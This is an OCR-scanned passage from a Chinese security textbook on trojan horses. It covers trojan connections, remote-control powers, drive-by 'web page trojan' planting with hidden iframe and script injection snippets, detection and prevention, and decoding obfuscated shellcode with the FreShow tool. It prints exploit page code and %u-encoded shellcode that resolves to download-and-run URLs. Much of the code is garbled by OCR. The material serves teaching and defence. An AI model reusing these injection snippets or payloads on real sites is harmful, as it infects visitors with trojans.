服务 端 都 要 在 线 。 在 此 基础 上 ,控制 端 可 以 通过 木马 端口 与 服务 端 建立 连接 。 

假设 A 机 为 控制 端 ,B 机 为 服务 端 ,对 于 A 机 来 说 ,要 与 B 机 建立 连接 必须 知道 机 的 
木马 端口 和 IP 地 址 ,由 于 木马 端口 是 A 机 事先 设 定 的 ,为 已 知 项 ,所 以 最 重要 的 是 如 何 获 
得 BB 机 的 IP 地址 。 获 得 B 机 的 IP 地 址 的 方法 主要 有 两 种 : 信息 反馈 和 IP 扫描。 

信息 反馈 方法 见 4); IP 扫描 方法 为 : 因为 B 机 装 有 木马 程序 ,所 以 它 的 木马 端口 7626 
是 处 于 开放 状态 的 ,A 机 只 要 扫描 IP 地 址 段 中 7626 端口 开放 的 主机 就 行 了 。 例 如 B 机 的 
IP 地 址 是 202. 102. 47. 56, 当 A 机 扫描 到 这 个 IP 时 发 现 它 的 7626 端口 是 开放 的 ,那么 这 个 
IP 就 会 被 添加 到 列表 中 ,这 时 A 机 就 可 以 通过 木马 的 控制 端 程序 向 B 机 发 出 连接 信号 ,B 
机 中 的 木马 程序 收 到 信号 后 立即 做 出 响应 , 当 A 机 收 到 响应 的 信号 后 ,开启 一 个 随机 端口 
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1031 与 BB 机 的 木马 端口 7626 建立 连接 ,到 这 时 一 个 木马 连接 才 算 真正 建立 。 

值得 一 提 的 是 ,要 扫描 整个 IP 地 址 段 显然 费时 费力 ,一 般 来 说 ,控制 端 都 是 先 通过 信息 
反馈 获得 服务 端的 IP 地 址 ,由 于 拨号 上 网 的 IP 是 动态 的 , 即 用户 每 次 上 网 的 IP 都 是 不 同 
的 ,但 是 这 个 IP 是 在 一 定 范围 内 变动 的 ,如 B 机 的 IP 是 202.102.47.56, 那 么 B 机 上 网 IP 
的 变动 范围 是 202. 102. 000. 000 一 202. 102. 255. 255, 所 以 每 次 控制 端 只 要 搜索 这 个 IP 地 
址 段 就 可 以 找到 B 机 了 。 

6) 远程 控制 

木马 连接 建立 后 ,控制 端 端口 和 木马 端口 之 间 将 会 出 现 一 条 通道 。 控 制 端 上 的 控制 端 
程序 可 借 这 条 通道 与 服务 端 上 的 木马 程序 取得 联系 ,并 通过 木马 程序 对 服务 端 进行 远程 
控制 。 

控制 端 具体 享有 以 下 控制 权限 : 

(1) 窃取 密码 。 一 切 以 明文 的 形式 、x 形式 出 现 或 缓存 在 Cache 中 的 密码 都 能 被 木马 
侦 测 到 ,此 外 很 多 木马 还 提供 有 击 键 记录 功能 , 它 将 会 记录 服务 端 每 次 硕 击 键盘 的 动作 ,所 
以 一 旦 有 木马 入 侵 ,密码 将 很 容易 被 窃取 。 

(2) 文件 操作 。 控 制 端 可 借 由 远程 控制 对 服务 端 上 的 文件 进行 删除 新建, 修改 、 上 传 、 
下 载 .运行 .更改 属性 等 一 系列 操作 ,基本 涵盖 了 Windows 平台 上 所 有 的 文件 操作 功能 。 

(3) 修改 注册 表 。 控 制 端 可 任意 修改 服务 端 注册 表 , 包 括 删除 .新 建 或 修改 主键 . 子 键 、 
键 值 。 有 了 这 项 功能 ,控制 端 就 可 以 禁止 服务 端 软 驱 .光驱 的 使 用 , 锁 住 服务 端的 注册 表 ,将 
服务 端木 马 的 触发 条 件 设置 得 更 隐蔽 的 一 系列 高 级 操作 。 

(4) 系统 操作 。 这 项 内 容 包 括 重启 或 关闭 服务 端 操作 系统 , 断 开 服务 端 网 络 连接 ,控制 
服务 端的 鼠标 、 键 盘 ,监视 服务 端 桌面 操作 ,查看 服务 端 进程 等 ,控制 端 甚 至 可 以 随时 给 服务 

防治 木马 的 危害 ,应 该 采取 以 下 措施 : 

。 安装 杀毒 软件 和 个 人 防火 墙 ,并 及 时 升级 。 

。 对 个 人 防火 墙 设置 好 安全 等 级 ,防止 未 知 程序 向 外 传送 数据 。 

。 防止 恶意 网 站 在 自己 的 计算 机 上 安装 不 明 软 件 和 浏览 器 插件 ,以 免 被 木马 趁机 侵入 。 


7.3.3 网 页 挂 马 


木马 不 会 自动 运行 ,也 不 具有 自我 传播 能 力 ,因此 必须 要 想 办 法 让 用 户 下 载 、 运 行 木 马 。 
用 户 在 上 网 时 ,必须 不 断 单 击 链 接 下 载运 行 网 页 文件 到 用 户 的 计算 机 ,这 显然 能 够 满足 木 
马 传播 的 要 求 。 

网 页 挂 马 就 是 攻击 者 通过 在 正常 的 网 页 (通常 是 网 站 的 主页 ) 插 入 一段 代码 ,浏览 者 在 
打开 该 页 面 的 时 候 , 这 段 代 码 被 执行 ,然后 下 载 并 运行 某 木马 的 服务 器 端 程序 ,进而 控制 浏 
览 者 的 主机 ,如 图 7-4 所 示 。 

通过 加 密 变形 ,网 页 挂 马 可 以 躲避 传统 的 杀毒 软件 的 处 理 。 图 7-5 为 对 如 图 7-4 所 示 
网 页 挂 马 加 密 变形 后 的 结果 。 

网 页 挂 马 是 木马 的 主要 传播 源 。 这 是 因为 网 络 上 挂 马 的 程序 非常 多 ,并 且 挂 马 的 代码 
不 用 攻击 者 编写 ,完全 可 以 采用 工具 化 傻瓜 化 的 方式 实现 ,其 技术 门槛 相对 比较 低 。 目 前 
对 于 网 络 的 危害 也 特别 大 。 
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Ey 加 给 四 格式 吕 ) 查看 GD) 帮助) 





varurFhttpJidauto ruexpl/glload php?id=30460" 
var m=new Array(); 
var mi=0; 
function hex(num widthjf 
var digits="0123456789ABCDEF"; 
var hex=digits substr(num&OxF 1); 
while(num>0xFX 
NuM=numM>>>4; 
hex=digits substr(num&OxF.,1)+hex; 
} 
var width=(width ?width-0) 
while(hex length<width)hex="0"+hex 
retun hex 


} 
function addr(add){ 
retum unescape("%u"+hex(addr&OxFFFF.4)+"%u"+hex((addr>>16)8&0xFFFF,4)); 


} 
function uneststn 





Vartmp= 

fortvar i=0ii<str lengthii+=4){ 
tmp+=addr((str.charCodeAt(i+3)<<24)+ 
(str.charCodeAt(i+2)<<16)+ 
(str charCodeAt(i+ 1)<<8)+ 


Str.charCodeAl()), 
} 
return unescape(tmp), 
} 
function hav({ 
m=m; 


setTimeout("hav()",1000); 


} 

function gss(ss,sss\( 
while(ss length*2<sssjss+=ss; 
SS=SS substring(0,sss/2); 
return ss; 


} 
function ms()f 


Var plc=unescape("%U4343%Uu4343%Uu4343%u0FEB%u335B%u66C9%u80B9%u8001%UEF33% 
uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%ouEFEF%u64EF%uE3AF%u9F643%u42F3%u9F64%u6EE7%ouEF039% 








图 7-4 未 加 密 的 挂 马 网 页 





本 回回 
文件 LL 畏 贸 六 ) 格式 四 ) 查看 如 帮助 0 
khtmt><body><div style="displaynone” 
id="content">eozriEg9Fo7OKkorhiINvek@7DDXIOY9VOFAnwpHOgkX_ew3DODXxdp6niH3ceMYoe1Fhiy@EyNdXriozrv4IMSNhiHadkSG5Mo4h 和 
w5opDeozriEgFo7OpxViywpzrioP1AXdF@sdpH7EYCcJXHagpPegY9nJYydDriozriEgFo7E1yJhY@ggINQRyohi5AEY5koRA_gB@mj5Twpzrio | 
zrv4IMSvh1kVityJhY@gDHsaDFsnDM5HhkTiEykjBHLopDeozno1k5sepCcHpAVI3vD@ydDnozrioPpAVhHagppHXI@dXriozrio2YCcgl9sd1yn 
wMHhgkNgJkocHpAVIP3vD@PGRXDvh1kwXriozriNDrioziEgFo7pkynek5VIXcse1@cdlcsel@ciD3opDeozrio1k5sepCcEYCcDHPalpmJY1e | 
gY9nJYyvh1kVXT3OpX5aewwpzriozroaekARDpSwh1kwXriozrFYznoP1AXdF@sdpH7OF9niM5Ge19RgXwYznozroaekARDpS_DpCgwF67g1 
5OOPARpX5aew5Ge19RDP3vD@bl5@PbRXDOOPARpX5aew5vOF9nlMpHRyvoHP3vVDG@bj5@PbRXydXriozrFYzrioP1AXdF@sdpH7OKkHa | 
dM5hJkospweozrioPk6RJT@VeMFOHTwpzriozrxDIM5EgFo7OYFQYDyYM@RDHPalpmJYwodXFbRXwYzriozribgp3wOIGne1ocEXsnDMHhe 
Y6RwAXnh1UnJXywpyyxlobRXDpzriozrivpM@RDHVchFogkpgahAG@cOYDORX1xXRyvopXeozriozr5hJkoXpF54IMaDe1C4Bk5odXLoEIvRXD 三 
pzriozrihJkoXpF54IMaDe1C4Bk5ohXydXriozniNDrioziOg1@aDMH7OkHadMV4eMCcEKT79XwpzriozdeozriEhkHgekyDIpSvhFvcOXwYzriozrT 
VRpwpzriozrsaekqshpCDhk@cHT54Ik5oHTPGiy3QRXwpznozdeozriEhkHgekyDipSedMscpMsrpMsggXwYzriozrcchYPaeXsgDHPalprnJYIOjs 
gwMyhwMDNYMswXriozrihwMFhwMHhgkNgJkoslprcEYPhwMsDHyydXriozriOg1@aDMH7pMswxriozrFYzrioP1AXdF@sdpH7OpscOXwYznioz 
mv4IMSQJpVVRkHadMV4eMCCHTC_J5sbYYC_J5sbYYC_J5sbYYC_Jyba5AC_wyS_XAC_D5vhuDC_JD3OuDC_JD3QRYC_g@bgYyC_gQ@ob 
YYC_gq@_juAC_gq@kQR5C_D@bakAC_D@b5Q@C_JD_ JX@C_JObnRGC 0Q@ba5QC_D5@_5@C_gQsG5@C_gDbj5C_J5oEkyC_gDbj 
5C_D5mak5C_g@b7YYC_9@ba5AC_D5@_5@C_DAMQYYC_D5LW5C_g@LGuyC_JycQYYC_g@b4RYC_g@ba5@C_gAUX5C_DAM_5A 





RDC_g@ba5@C_gAUX5C_gAbj5AC_J@cEXQC_gDURYAC_D5vGR5C_D@cGuAC_g@kQX5C_gQ@bau@C_DAL_5@QC_gDUX5C_D5 
@h5AC_g@_4uUAC_g@mcR5C_D5@055C_DQ@cOuAC_JycOuDC_g@bi5C_gQ@ba5@C_JDc05@C_DG@AbuDC_gDbgByC_w5kQY5C 9g 
be5@CUD5 SQC DOSOUAG DyUISC DybYAC. D5vOS@C WADAUAC VAYSC, gba QC DAbaS@C OAUISC_ JOAESAC_ DA 
B@C_DAUISC_JycEkSC_g@bcR@C_g@bas@C._gAUakAC_Dykhs@C_DAs_5@C_WwALoRyC_DYvRAC_g@_45@C_JDUsY5C_g@ba5 
@C_gDU4yC_D5@h5@C_g@sGuAC_g@McR5C_D5@O55C_D@cOuAC_gAbTY5C_g@ba5@C_JDA_5@C_DAc_BDC_gAUakAC_J@ 
ag5AC_DAagj5C_gy3OKAC_WAbsRACG_DAaR5@C_gAUi5C_JDAEkyC_DAv_uAC_DAUN5C_JycEk5C_g@bgkAC_9@ba5@C_g@bcR5C 
_9DU4YC_D5@h5@C_gQ@cGuAC_g@WcR5C_D5@055C_DQ@cOuAC D@b7Y5C_gQ@ba5@C_JDA_5@C_D5@GhC_D@b4uAC_gQm 
上 R5C_D5@055C_DG@cOuAC_g@b7Y5C_g@ba5@C_gAma5@C_DAWRB5C_JymakAC_JymakAC_JymakAC_JymakAC_JysEYAC_DAA 
5AC_D5@OKAC-JyWWgR5C_DAW4iDC_Jyb4YC_D5@OuAC_D5@QYyC_g@coxyC_DAoEF5C_DAM_kyC_gDaj5C_D5GbkyC_DGLox 
AC_g@asY5C_DAMGYAC_gDMEj5C_g@ag5@C_J@a4YAC_gAvOX5C_jJ50GuGC_DyaakAC_JQ@aRuDC_g@3GRDC_DG@baRyCc_gywWn 
45C_g@coXAC_DYLOR@C_gQ@aa5yC_gAb4i@C_gym7j5C_gyLbB5C_gDURuyC_DAAQRAC_Jy@Ej5C_DAAEj5C_g@ag5AC_JDMhXyC 
_gG@sSEj5C_D5G@GGB5C_D@sOu5C_wyo_kAC_g@_j5C_g@aj5C_DALORAC_DYyWR5yC_g@pak5C_gy 7Y5C_gy3GRYC_DAU4yC_gAsO 
BQ@C_oA3G5yC_g@b4wyC_w5@EjDC_w53ei5C_DybgRAC_D5MDX@C_DyNj5C_w5AERYC_D5bJ5C-w5oORG@C_DybJR5C_w5KER5C 
_DybJyC_DybgRDC_D5bYAC_D5@ERYC_w53ORG@C_w53EiDC_D5MhX@C_wyWi5C_wy3hYyC_wyvh5C_Jy3hyNopDeozrioTAXrepCoge 
Rn4IMN4d1CcOXwpzhiozmeT5Ni1yOg1@aDMHcEyydXnozriNITFGYDeozrioPk6RJT5gJk6Viyk7YF3heyV7YFPVFsVyk4Y3Qy3xEMPViMPglH 
PalpmJYIOiHsgwMFVMFSVEX3rdX3vwykopDeozrioPk6RJTsggirgwM5Ge19RJX5gJk6sEHsgwMyxEYNVIX5gJk6VEYNggXXyIFswXriozriEdpoc 
OYFQYDYiYNwRYDdOXTwZYIVYMswEMPgdDeozrio2Y6NXydXrioziOg1@aDMHcOYydXriozrFYzrioP1AXdF@sdpH7pFXRIY5IFlspweozrioP 
k6RJToaekFHhkPrdDeozriozYxcppNYIHsaDFsnDMyXd15QiHLoOIFOpwNopweozriozr@RgwwYzriozrioPk6RJTVrdMynhIXRIYHhgkNgJkosiprc 
OYPIFIXEpCXd1@chHLopDeozrioziOg1@Vi1XghkTalp@XpFoahF@ah@PahpCXek50ppNYh1VnDTydXriozriozroaekHhg1@4Bk@RgYNaJ 
kCcHTVrhFsggY9REHNhepsse1dOpXVrdMynhXwpzriozioPMCnokoXeToaekwpzriozriNwF6nwF5cO1ydDriozriozroaekARDpSHhkPrdDeozri 
ozrFYzriozrFaepsadweozriozr@RgwwYzriozioPMCnglHadkSGKF@slkCcMvNYh1VnJXXRIYydXriozriozroaekARDpSOg1G@wXriozriozdV4ekV 
ceXCspweozriozriOg1@aDMH7HpArepwpzriozriNDrioziNDriozrFYzrioP1AXdF@sdpH7pAoahF@adv5leHHspweozrioPk6RJToVXpArepwpzr 














7-5 加 密 后 的 挂 马 网 页 
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1. 网 页 挂 马 的 种 类 

网 页 挂 马 的 种 类 主要 有 以 下 几 种 : 

(1) iframe 式 挂 马 。 被 攻击 者 利用 iframe 语句 ,加 载 网 页 木马 到 任意 网 页 中 都 可 执行 
的 挂 马 形式 ,也 称 框架 挂 马 , 是 最 早 也 是 最 有 效 的 一 种 网 络 挂 马 技术 。 通 常 的 挂 马 代码 
如 下 : 


< iframe src = http://www. xxx. com/muma. html width = 0 height = 0 ></iframe> 


在 打开 插入 该 句 代码 的 网 页 后 ,也 就 打开 了 http: //www. xxx. com/muma. html 页 面 
框架 。 这 种 挂 马 能 够 成 功 的 关键 是 由 于 它 的 长 和 宽 都 为 0, 用户 很 难 察觉 ,非常 具有 隐 
蔽 性 。 

(2) js 脚本 挂 马 。js 挂 马 是 一 种 利用 js 脚本 文件 调用 的 原理 进行 的 网 页 木马 隐蔽 挂 马 
技术 ,通常 黑客 先 制作 一 个 js 文件 ,如 


document, write("< iframe width = 0 height = 0 src = ' 地 址 ></iframe >"); 
保存 为 gm. js, 然 后 利用 js 代码 调用 到 挂 马 的 网 页 。 通 常 代码 如 下 : 
< script language = javascript src = http://www. xxx. com/gm. js></script> 


http: //www. xxx. com/gm.js 就 是 一 个 js 脚本 文件 ,通过 它 调用 和 执行 木马 的 服务 
端 , 由 于 调用 的 js 文件 生成 的 框架 长 、 宽 都 为 0, 所 以 虽然 调用 程序 执行 了 ,但 用 户 无 法 察 
觉 。 这 些 js 文件 一 般 都 可 以 通过 工具 生成 ,攻击 者 只 需 输 入 相关 的 选项 就 可 以 了 。 还 可 以 
使 用 js 变形 < SCRIPT language 一 "JScript. Encode" src 王 http: //www. xxx. com/muma. 
txt ></script >,muma. txt 可 改 成 任意 后 级 。 

(3) 图 像 伪 装 挂 马 。 攻 击 者 将 类 似 :http://www. xxx. com/test. htm 中 的 木马 代码 植 
入 到 test. gif 图 像 文件 中 ,这 些 嵌 入 代码 的 图 像 都 可 以 用 工具 生成 ,攻击 者 只 需 输入 相关 的 
选项 就 可 以 了 。 

图 像 木 马 生成 后 ,再 利用 代码 调用 执行 ,代码 如 : 


< htm]l > 
< iframe src = "http://www. xxx. com/test. htm" height = 0 width = 0> </iframe> 





< img src = "http://www. xxx. com/test. jpg"></center > 
</html> 


这 样 , 当 用 户 打开 http: //www. xxx. com/test. htm 时 ,网 页 中 的 木马 代码 也 随 之 
运行 。 

(4) 网 络 钓鱼 式 挂 马 。 这 是 网 络 中 最 常见 的 欺骗 手段 ,黑客 们 利用 人 们 的 猜 奇 贪心 等 
心理 伪装 构造 一 个 链接 或 者 一 个 网 页 ,利用 社会 工程 学 欺骗 方法 ,引诱 点 击 , 当 用 户 打开 一 
个 看 似 正常 的 页 面 时 ,网 页 代码 随 之 运行 .隐蔽 性 极 高 。 这 种 方式 往往 会 欺骗 用 户 输入 某 些 
个 人 隐私 信息 ,然后 窃取 个 人 隐私 相关 联 。 常 见 的 如 获奖 消息 、 赠 送 QQ 币 等 。 

(5) URL 伪装 挂 马 。 这 是 一 种 高 级 欺骗 手段 ,是 黑客 利用 IE 或 者 Firefox 浏览 器 的 设 
计 缺 陷 制 造 的 一 种 高 级 欺骗 技术 , 当 用 户 访问 木马 页 面 时 地 址 栏 显示 www. sina. com 或 者 
security. ctocio. com. cn 等 用 户 信 任 地 址 ,其 实 却 打开 了 被 挂 马 的 页 面 ,从 而 实现 欺骗 。 
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2. 网 页 挂 马 的 传播 方式 

网 页 挂 马 采用 的 伪装 方式 和 传播 方式 主要 有 以 下 几 种 : 

(1) 将 木马 伪装 为 页 面 元 素 。 木 马 会 被 浏览 器 自动 下 载 到 本 地 。 

(2) 利用 脚本 运行 的 漏洞 下 载 木 马 。 

(3) 利用 脚本 运行 的 漏洞 释放 隐 含 在 网 页 脚本 中 的 木马 。 

(4) 将 木马 伪装 为 缺失 的 组 件 , 或 和 缺失 的 组 件 捆绑 在 一 起 (例如 ,Flash 播放 插件 ) 。 
这 样 既 达 到 了 下 载 的 目的 ,下 载 的 组 件 又 会 被 浏览 器 自动 执行 。 

(5) 通过 脚本 运行 调用 某 些 . com 组 件 , 利 用 其 漏洞 下 载 木 马 。 

(6) 在 泻 染 页 面 内 容 的 过 程 中 利用 格式 溢出 释放 木马 (例如 ,. ani 格式 溢出 漏洞 ) 。 

(7) 在 泻 染 页 面 内 容 的 过 程 中 利用 格式 溢出 下 载 木 马 ( 例 如 ,flash9. 0. 115 的 播放 漏洞 ) 。 

3. 网 页 挂 马 的 运行 方式 

网 页 挂 马 通常 会 采用 下 列 方式 运行 : 

(1) 利用 页 面 元 素 泻 染 过 程 中 的 格式 溢出 执行 Shellcode, 进 一 步 执行 下 载 的 木马 。 

(2) 利用 脚本 运行 的 漏洞 执行 木马 。 

(3) 伪装 成 缺失 组 件 的 安装 包 被 浏览 器 自动 执行 。 

(4) 通过 脚本 调用 . com 组 件 利用 其 漏洞 执行 木马 。 

(5) 利用 页 面 元 素 泻 染 过 程 中 的 格式 溢出 直接 执行 木马 。 

(6) 利用 . com 组 件 与 外 部 其 他 程序 通信 ,通过 其 他 程序 启动 木马 (例如 ,realplayer10.5 
存在 的 播放 列表 溢出 漏洞 ) 。 

4. 网 页 挂 马 的 检测 

网 页 挂 马 的 检测 方式 主要 有 

(1) 特征 匹配 。 将 网 页 挂 马 的 脚本 按 脚本 病毒 处 理 进行 检测 。 但 是 网 页 脚本 变形 方 
式 、 加 密 方式 比 起 传统 的 PE 格式 病毒 更 为 多 样 ,检测 起 来 也 更 加 困难 。 

(2) 主动 防御 。 当 浏览 器 要 做 出 某 些 动作 时 ,做 出 提示 。 比 如 浏览 器 创建 一 个 暴风 影 
音 播放 器 时 ,提示 是 否 允 许 运 行 。 在 多 数 情况 下 用 户 都 会 选择 “是 ”, 网 页 木马 会 因此 得 到 
执行 。 

(3) 检查 父 进 程 是 否 为 浏览 器 。 这 种 方法 可 以 很 容易 地 被 躲 过 且 会 对 很 多 插件 造成 
误 报 。 

5. 网 页 挂 马 的 防范 

通常 可 以 通过 以 下 措施 防范 网 页 挂 马 : 

(1) 开放 上 传 附件 功能 的 网 站 一 定 要 进行 身份 认证 ,并 只 允许 信任 的 人 上 传 程序 。 

(2) 及 时 更 新 并 升级 所 使 用 的 程序 (包括 操作 系统 和 应 用 程序 ) 。 

(3) 建议 尽量 不 要 在 前 台 网 页 上 加 注 后 台 管 理 程序 登录 页 面 的 链接 。 

(4) 及 时 备份 数据 库 等 重要 文件 ,但 不 要 把 备份 数据 库 放 在 程序 默认 的 备份 目录 下 。 

(5) 设置 较为 复杂 的 管理 员 的 用 户 名 和 密码 。 

(6) 设置 在 IIS 中 禁止 写 和 信和 目录 禁止 执行 的 功能 ,两 项 功能 组 合 , 可 以 有 效 地 防止 
ASP 木马 。 

(7) 可 以 在 服务 器 、 虚 拟 主机 控制 面板 ,设置 执行 权限 选项 中 ,直接 将 有 上 传 权限 的 目 
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录 删 去 ,取消 ASP 的 运行 权限 。 
(8) 创建 一 个 Robots. txt 上 传 到 网 站 根 目 录 。Robots 能 够 有 效 地 防范 利用 搜索 引擎 
窃取 信息 的 骇 客 。 


7.3.4 加 密 木 马 解密 


加 密 挂 马 技术 的 出 现 使 得 木马 特征 消失 ,通过 比 对 木马 特征 库 识别 木马 的 常用 方法 失 
效 ,增加 了 木马 检测 的 难度 ,很 难 判断 是 否 挂 马 ,因此 使 得 防范 更 加 困难 。 

为 了 解决 这 个 问题 ,研究 者 开发 了 木马 解密 辅助 工具 来 对 木马 解密 ,以 便 进一步 识别 木 
马 。FreShow 就 是 一 个 这 样 的 工具 ,其 主 界面 如 图 7-6 所 示 。 





FreShow 的 主 界面 由 处 理 框 结果 框 、 收 集 区 域 3 部 分 组 成 。 界 面 左上 角 的 处 理 框 用 
于 输入 或 显示 需要 解密 的 内 容 ; 左下 角 的 结果 框 用 于 显示 解密 结果 ; 界面 右 半 部 分 的 收集 
区 域 用 于 罗列 筛选 出 的 恶意 链接 。 

过 滤 选 项 的 可 选项 有 : 

(1) Qeye 过 滤 网 页 源 代码 中 潜在 的 恶意 链接 ,如 iframe、script 结果 会 显示 在 收集 
区 域 ; 

(2) Connect 连接 字符 串 , 如 使 'a 十 b' 变 为 ab; 

(3) Nuls 一 一 过 滤 空 字符 串 ,使 得 脚本 更 容易 阅读 ; 

(4) Replace 一 一 替换 字符 串 ; 

(5) Reverse 一 一 逆转 字符 ,一 些 特殊 的 脚本 采用 这 种 方式 。 

解密 选项 的 可 选项 有 : 

(1) Esc 一 一 可 以 转换 %、%u、\x 等 形式 的 转 义 字符 ,\x 可 以 再 操作 异 或 ,如 果 知 道 确 
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切 的 值 , 就 在 附加 区 域 里 输入 它 ,或 者 使 用 枚 举 异 或 enumXOR ,会 自动 处 理 并 返回 结果 ; 

(2) ASCII 一 一 可 以 转换 “1 ,2,3” 形 式 的 ASCII 码 ,可 以 覆盖 分 隔 符 ; 

(3) US-ASCII 一 一 代码 类 似 汉 字 , 且 代码 中 包含 有 “< meta http-equiv 二 "Content- 
Type"? c? />”; 

(4) Alpha2 一 一 这 个 解密 算法 针对 的 是 Replayer 漏洞 采用 的 加 密 算法 ; 

(5) enumXOR 一 一 对 十 六 进 制 的 数据 进行 枚 举 异 或 ,并 返回 结果 ; 

(6) Base64 一 一 这 种 加 密 方式 很 少见 ,加 密 特 征 为 大 小 写字 母 及 数字 混 排 ,末尾 可 能 包 

(7) Winwebmail 一 一 网 马 加 密 代码 中 有 类 似 document. write (unencode (webmm， 
3422) ) 的 内 容 。 


1. Shellcode 网 马 解密 


Shellcode 指 缓冲 区 溢出 攻击 中 植 入 进程 的 代码 。 这 段 代 码 可 以 是 出 于 恶作剧 目的 而 
弹出 一 个 消息 框 ,也 可 以 是 出 于 攻击 目的 而 删改 重要 文件 、 窃 取 数 据 、 上 传 木马 病毒 并 运行 ， 
甚至 是 出 于 破坏 目的 格式 化 硬盘 等 。 

Shellcode 网 马 特征 : 以 相同 分 隔 符 ( 一 般 为 %u) 分 隔 的 4 位 一 组 的 十 六 进 制 字符 串 。 

解密 方法 : 

(1) 对 于 直接 使 用 %u 来 分 隔 的 Shellcode, 通 过 两 次 Esc 可 以 直接 解密 出 网 马 地 址 。 

(2) 对 于 通过 类 Shellcode 形式 加 密 的 网 马 ,可 以 通过 将 代码 进行 适当 处 理 (将 代码 蔡 
换 为 分 隔 符 %u) ,再 进行 两 次 Esc 解密 。 

【 例 7-1】 解密 木马 。 

var Shellcode = unescape("% u54EB% u758B% u8B3C% u3574% u0378% u56F5 % u768B% u0320% 

U33F5 % u49C9 % URD41 % uDB33 % uOF36 % ul4BE% u3828% u74F2% uC108% uODCB% uDAO03 % UEB40 % 

U3BEF % u75DF % u242C% uFF3C% u95DO % uBF50 % ulA36 % u702F % u6FE8 % uFFFF % uBBFF % u2454 % 

UBDFC % uBAS52 % uDB33 % u5353 % UEB52 % u5324% uDOFF % uBFSD% uFE98% uOE8BA% u53E8 % uFFFF% 

UB83FF % uO04EC % u2C83 % u6224% uDOFF % uU7EBF % uE2D8 % UE873 % uFFAO % UFFFF % uFF52% UE8D0 % 


UFFD7 % uFFFF % u7468 % u7074 % u2f3a% u772f % u7777 % u61l2e% u6870% u6361 % u2e6b% u6f63% 
U2f6d % u7878 % u6f6f % u742f % U6f62 % u2e79 % u7865 % u0065 % u0000") 


解 :““ 代码 符合 Shellcode 特征 。 .使 用 Shellcode 解密 。 

(1) 如 图 7-7 所 示 , 复 制 粘贴 代码 内 容 至 FreShow 处 理 框 ,解密 选项 选择 ESC, 单 击 “ 解 
码 ” 按 钮 进行 一 次 解密 ,解密 后 内 容 会 显示 在 结果 框 , 单 击 “ 向 上 ”按钮 将 结果 框 代码 上 翻 至 
处 理 框 。 

(2) 如 图 7-8 所 示 ,进行 二 次 解密 ,解密 选项 选择 ESC , 单 击 “解码 ”按钮 进行 二 次 解密 ， 
获得 网 马 下 载 地 址 : http: //www. aphack. com/tboy. exe。 

【 例 7-2】 解密 木马 : 


ss 


varYTdown=unescape("%u9"+"\x30"+"90%u9"+"\x30"+"9 
0%uElD9 %u34D9 % u5824%u5858%u3358 % uB3DB% u031C% u31C3 
%u66C9% uE981 SuFAG65% uu3080% u4021% uFAE2%u1l7C9% u2122 
su4921% u0121% u2121% u214B% uF1lDE%u2198%u2131 % uAA21 
SuCADI9 % uTF24% u85D2% uF1DE% uD7C9 % uDEDES% u41E2% uAAl17S 
u054D% ul705% u64AAS ul171D% u75AAS u5924% uF422% uAAl1FS 
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u396B%SuAAlFS%u0l17B% uFC22% ulAC2% ulF68% uDDE1% uAS58D S$%u 
55E1%SuE026% u2CEE% uD922% uD5CAS%SulAl17% u055D$% u5409%u 


1l1FFES%Su7BAA%Su2205% u47FCS%UuUAAlFS%u6A2D% uAAlF 


C22 
A47 
20£ 
了 
121 
i121 
i121 
121 
121 


SS 


CE 


uAAlF 
uDEDE 
u4c4e 
u2121 
u2121 
u2121 
u2121 
u2121 
u2121 


SuAA25 
% u5549 
%u560e 
Su2121 
%Su2121 
%u2121 
%u2121 
%Su2121 
%u2121 


RPR 


uE422 
u5155 
u4344 
u2121 
u2121 
下 32 
u2121 
u2121 
u2121 






































uA817 
uO0elb 
ul20e 
u2121 
u2121 
入 本 二 时 二 
u2121 
u2121 
u2121 


最 邮 邮 有 邮 邮 最 几 


u0565 
ul40e 
u440f 
u2121 
六 时 二 是 二 
u2121 
u2121 
u2121 
u0021 


图 7-7 Shellcode 网 马 第 一 次 解密 


u403D 
ul34d 
u4459 
多 和 法 于 
三 急 全 各 二 
各 和 时 于 
u2121 
u2121 








u3D7B 
uC9E2 
ul94e 
各 多 计时 
vli2l 
信守 
入 21 
u2121 
u2121 


oR dR Peo 


uF 
uD 
ud4 
u2 
u2 
u2 
u2 
u2 
u2 


解 : (1) 过 滤 空 格 。 首 先 代码 中 存在 大 量 空格 ,影响 代码 解密 ,因此 需要 去 掉 空格 。 如 
图 7-9 所 示 , 复 制 粘贴 代码 内 容 至 FreShow 处 理 框 ,过 滤 选 项 选择 NULs, 单 击 “ 过 滤 ” 按 钮 
过 滤 后 内 容 会 显示 在 结果 框 , 单 击 “ 向 上 ”按钮 将 结果 框 代码 上 翻 至 处 理 框 。 

(2) 如 图 7-10 所 示 ,进行 解密 ,解密 选项 选择 ESC, 单 击 “ 解 码 ” 按 钮 进行 一 次 解密 , 解 
密 后 内 容 会 显示 在 结果 框 , 单 击 “ 向 上 ”按钮 将 结果 框 代码 上 翻 至 处 理 框 。 

(3) 通过 第 一 次 ESC 解密 之 后 ,会 发 现代 码 中 与 21 进行 异 或 的 特别 多 (\X21) ,因此 判 
断 密 钥 为 21 ,进行 第 二 次 ESC 解密 。 解 密 选 项 选择 ESC, 密 钥 选 择 为 21, 单 击 “ 解 码 ” 按 钮 
进行 二 次 解密 ,结果 如 图 7-11 所 示 ,获得 网 马 下 载 地 址 : http: //512o8. com/web/3. exe。 
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图 7-8 Shellcode 网 马 第 二 次 解密 




















图 7-9 Shellcode 网 马 第 一 次 解密 
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图 7-10 ”Shellcode 网 马 第 二 次 解密 


‘© FreShow by jimmyleo 








Vi3beeVd9 vofva2 VevetcYoev56 A430e vd2 Of 
Vasvsovaavalvalvaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaival\ 
lvaivaivalvaivaivalvaivaivaivaivaivaivaivalvaivaivaivaivalvalvalVaivalY 
21VvaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaivaiVvaivaivaly 
也 和 TTETTTTTTTD 和 TIT 











E Er E 
Ee ar en es see 
://5l208.com/web/3.exe! 


图 7-11 Shellcode 网 马 第 三 次 解密 
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2. Alpha2 网 马 解密 


Realplay 漏洞 发 生 在 RealPlayer 的 一 个 Activex 控件 上 , 当 安 装 了 RealPlayer 的 用 户 
在 浏览 黑客 精心 构造 的 包含 恶意 代码 网 页 后 ,将 在 后 台 下 载 木马 病毒 并 运行 。 

Realplay 漏洞 多 采用 Alpha2 加 密 方 式 , 该 加 密 方 式 特征 为 代码 以 TYIIIIIIIIIIIIIIII 开 
